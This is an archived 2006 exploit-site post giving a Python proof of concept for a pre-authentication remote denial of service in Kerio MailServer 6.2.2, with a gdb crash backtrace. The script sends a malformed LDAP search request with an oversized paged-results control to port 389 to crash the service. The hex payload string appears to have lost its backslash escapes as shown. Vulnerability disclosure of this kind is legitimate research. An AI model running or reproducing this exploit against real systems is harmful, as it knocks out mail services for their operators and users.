Home / exploits kms1.py.txt
Posted on 15 December 2006
Hi, Kerio MailServer 6.3.1 changelog mentions the following bug fix: 'Fixed possible service stop when handling certain LDAP query' It turns out that vd_kms6 vulnerability (which is a part of VulnDisco since Oct, 2006) has been fixed. Below is a simple proof of concept code for this bug: #!/usr/bin/env python # kms1.py - Kerio MailServer 6.2.2 preauth remote DoS # fixed in Kerio MailServer 6.3.1 # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ gdb backtrace: # gdb -q ./mailserver core.18450 (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xb76000 Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'. Program terminated with signal 11, Segmentation fault. ... Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x0821c444 in LDAPSearchRequest::parsePagedResults () (gdb) bt #0 0x0821c444 in LDAPSearchRequest::parsePagedResults () #1 0x0821c387 in LDAPSearchRequest::setAll () #2 0x08093d8a in Ber::getSearchRequest () #3 0x08205e48 in LDAPServer::search () #4 0x08207de0 in LDAPServer::server () #5 0x08207e2e in ldap_handler () #6 0x0841be13 in KServerTask::handler () #7 0x082033c6 in KThreadPool::workerThread () #8 0x086ee7b6 in kerio::tiny::thread () #9 0x00772b80 in start_thread () from /lib/libpthread.so.0 #10 0x00558dee in clone () from /lib/libc.so.6 (gdb) x/i $eip 0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>: mov (%eax),%edx (gdb) i r eax eax 0x449 1097 """ from socket import * host = "localhost" port = 389 s = "x30x82x04x4dx02x01x26x63x82x04x46x04x00x0ax01x02" s += "x0ax01x00x02x01x00x02x01x00x01x01x00x87x0bx6fx62" s += "x6ax65x63x74x43x6cx61x73x73x30x02x04x00xa0x82x04" s += "x20x30x82x04x1c" s += "x01"*1024 s += "x16x31x2ex32x2ex38x34x30x2ex31x31" s += "x33x35x35x36x2ex31x2ex34x2ex34x37x33x01x01x00x04" s += "x00" sock = socket(AF_INET, SOCK_STREAM) sock.connect((host,port)) sock.sendall(s) sock.recv(10000) sock.close() Regards, -Evgeny